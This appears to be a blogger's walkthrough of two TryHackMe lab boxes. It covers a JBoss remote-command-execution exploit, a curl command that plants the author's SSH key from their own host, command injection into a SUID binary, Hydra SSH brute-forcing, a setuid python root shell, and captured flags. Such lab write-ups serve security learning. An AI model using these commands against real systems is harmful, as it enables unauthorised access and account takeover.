THM: Jacob & KOTH May 2020
Jacob the Boss
Find a way in and learn a little more.
First of all, add the jacobtheboss.box address to your hosts file
This is Jacob the Boss from THM.
Ports
Quite a few here:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
1090/tcp open ff-fms
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3306/tcp open mysql
3873/tcp open fagordnc
4444/tcp open krb524
4445/tcp open upnotifyp
4446/tcp open n1-fwp
4457/tcp open prRegister
4712/tcp open unknown
4713/tcp open pulseaudio
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
36348/tcp open unknown
40701/tcp open unknown
44894/tcp open unknown
Yikes! I didn’t run a detail scan.
8080
At http://jacobtheboss.box:8080/ we find JBoss, and if we click through to http://jacobtheboss.box:8080/web-console/ we find, amongst other things:
JBoss™ Application Server
Version: 5.0.0.GA (build: SVNTag=JBoss_5_0_0_GA date=200812041721)
Version Name: Morpheus
Built on: December 4 2008
So this is old as anything; who wants to bet it’s our way in?
Searchsploit
root@kali:/opt/tryhackme/jacob# searchsploit jboss
JBoss AS 3/4/5/6 - Remote Command Execution | multiple/webapps/36575.pySeems a likely candidate. I mirror it and try per the instructions:
root@kali:/opt/tryhackme/jacob# python 36575.py http://jacobtheboss.box:8080
But it doesn’t seem happy; I hardcode the port in the script and make a minor change to the argument parsing and this sorts it out, and I get a shell (of sorts).
For some reason I couldn’t get the shell I had to send me a ‘normal’ reverse shell, so instead I created an authorized_keys file and copied over my SSH public key. From there I could SSH in as Jacob.
[Type commands or "exit" to finish]
Shell> mkdir /home/jacob/.ssh
Shell> curl http://10.9.10.123:8000/id_rsa.pub -o /home/jacob/.ssh/authorized_keysAnd separately:
root@kali:/opt/tryhackme/jacob# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.32.152 - - [04/Jan/2021 05:21:34] "GET /id_rsa.pub HTTP/1.1" 200 -then
root@kali:/opt/tryhackme/jacob# ssh jacob@10.10.32.152
[jacob@jacobtheboss ~]$Privesc
Privesc was via an intentionally vulnerable SUID binary:
[jacob@jacobtheboss shm]$ pingsys '127.0.0.1; /bin/bash'
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.016 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
^C
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.016/0.022/0.029/0.008 ms
[root@jacobtheboss shm]# cd /root
[root@jacobtheboss root]#While I was mucking around with this I also logged into the MySQL server on the host and grabbed Jacob’s hash from the DotClear database (it was running on Port 80); couldn’t break it though. Since I couldn’t break it I decided to change it:
MariaDB [dotclear]> update dc_user set user_pwd = '$2y$12$mjwHvY4jPzz2hu3RAmxn..n7Yp3.ey2TiYjesOxPgcX0V1f2INw1S' where user_id = 'jacob';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0This was just ‘password’ from https://bcrypt-generator.com/ but it didn’t help at all. Lol.
KOTH
I also had a go at this. It doesn’t award any points and there are apparently 9 flags. I rooted the box and found 7 of them.
My notes look like below. Essentially we got a hint about weak passwords from the FTP server with anon access, I tried Hydra and got in, then Python had the setuid capability set so that was root. I ran around and found most of the flags. The first flag was on the FTP server.
root@kali:/opt/tryhackme/koth# hydra -l rcampbell -P /usr/share/wordlists/rockyou.txt ssh://10.10.229.240
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-04 04:35:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.229.240:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344239 to do in 1440:12h, 16 active
[STATUS] 114.00 tries/min, 342 tries in 00:03h, 14344063 to do in 2097:06h, 16 active
[STATUS] 109.14 tries/min, 764 tries in 00:07h, 14343641 to do in 2190:21h, 16 active
[22][ssh] host: 10.10.229.240 login: rcampbell password: maddie
rcampbell@gibson:~$ ls -lash
total 32K
4.0K drwxr-x--- 4 rcampbell rcampbell 4.0K Jan 4 09:42 .
4.0K drwxr-xr-x 6 root root 4.0K Apr 29 2020 ..
0 lrwxrwxrwx 1 rcampbell rcampbell 9 Apr 30 2020 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 rcampbell rcampbell 220 Apr 29 2020 .bash_logout
4.0K -rw-r--r-- 1 rcampbell rcampbell 3.7K Apr 29 2020 .bashrc
4.0K drwx------ 2 rcampbell rcampbell 4.0K Jan 4 09:42 .cache
4.0K -r-------- 1 rcampbell rcampbell 38 Apr 30 2020 .flag
4.0K drwx------ 3 rcampbell rcampbell 4.0K Jan 4 09:42 .gnupg
4.0K -rw-r--r-- 1 rcampbell rcampbell 807 Apr 29 2020 .profile
rcampbell@gibson:~$ cat .flag
thm{12361ad240fec43005844016092f1e05} FLAG 2
rcampbell@gibson:/dev/shm$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1002(rcampbell) groups=1002(rcampbell)
# cat .flag
thm{b94f8d2e715973f8bc75fe099c8492c4} // root flag FLAG 3
# cat business.txt
Remember to send the accounts to Rich by 5pm Friday.
Remember to change my password, before the meeting with Mr Belford.
I hope he doesnt fire me. I need to provide for my family
I need to send Ben the flag too, thm{d8deb5f0526ec81f784ce68e641cde40} // gcrawford FLAG 4
# cat .flag // production
thm{879f3238fb0a4bf1c23fd82032d237ff} // FLAG 5
# cat .flag // tryhackme
thm{3ce2fe64055d3b543360c3fc880194f8} // FLAG 6
# pwd
/home/production/webserver
# grep -r -i flag
Binary file server matches
resources/main.css:/* Curious one, arent you? Have a flag. thm{b63670f7192689782a45d8044c63197f}*/ // FLAG 7